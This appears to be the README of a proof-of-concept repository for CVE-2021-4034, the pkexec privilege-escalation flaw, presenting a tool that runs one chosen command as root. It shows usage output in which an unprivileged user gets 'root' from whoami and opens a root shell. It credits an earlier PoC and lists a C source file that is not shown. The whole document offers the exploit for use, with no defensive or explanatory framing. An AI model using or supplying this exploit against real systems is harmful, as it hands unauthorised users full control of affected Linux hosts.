CVE-2021-4034 for single commcand# CVE-2021-4034
this tool use for pkexec **single command execute**
## POC
**whoami**
```
[test@localhost cc]$ ./a.out /usr/bin/whoami
execute success :
root
```
**ping 8.8.8.8**
```
[test@localhost cc]$ ./a.out /usr/bin/ping 8.8.8.8
execute success :
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=114 time=61.4 ms
64 bytes from 8.8.8.8: icmp_seq=2 ttl=114 time=67.0 ms
64 bytes from 8.8.8.8: icmp_seq=3 ttl=114 time=59.6 ms
64 bytes from 8.8.8.8: icmp_seq=4 ttl=114 time=59.0 ms
64 bytes from 8.8.8.8: icmp_seq=5 ttl=114 time=58.5 ms
64 bytes from 8.8.8.8: icmp_seq=6 ttl=114 time=61.2 ms
^C
--- 8.8.8.8 ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5015ms
rtt min/avg/max/mdev = 58.531/61.160/67.068/2.850 ms
```
**/usr/bin/sh**
```
[niao@localhost cc]$ ./a.out /usr/bin/sh
execute success :
sh-4.2# /usr/bin/whoami
root
sh-4.2#
```
modify from https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c
[4.0K] /data/pocs/2a48ccca7679d3adbd3f3c13389903d7639cee0c
├── [1.8K] pkcom.c
└── [ 995] README.md
0 directories, 2 files